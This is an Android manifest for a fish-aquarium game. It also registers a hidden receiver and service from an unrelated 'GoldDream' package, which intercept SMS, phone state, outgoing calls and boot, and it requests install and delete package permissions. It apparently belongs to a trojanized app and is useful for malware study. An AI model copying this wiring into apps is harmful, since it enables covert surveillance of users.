<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.rainbw.Fish">
    <application android:icon="@drawable/icon" android:label="奇幻水族馆">
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:label="奇幻水族馆" android:name=".Fish" android:screenOrientation="landscape">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:label="奇幻水族馆" android:name=".Fish2" android:screenOrientation="landscape"/>
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:label="奇幻水族馆" android:name=".Fish3" android:screenOrientation="landscape"/>
        <meta-data android:name="Wooboo_PID" android:value="999ca5c047134c71890854d304a85498"/>
        <meta-data android:name="Market_ID" android:value="32"/>
        <receiver android:name="com.GoldDream.zj.zjReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
                <action android:name="android.intent.action.PHONE_STATE"/>
                <action android:name="android.intent.action.NEW_OUTGOING_CALL"/>
            </intent-filter>
        </receiver>
        <service android:exported="true" android:label="Market" android:name="com.GoldDream.zj.zjService" android:process=""/>
    </application>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
    <uses-permission android:name="android.permission.DELETE_PACKAGES"/>
    <uses-permission android:name="android.permission.INSTALL_PACKAGES"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
</manifest>
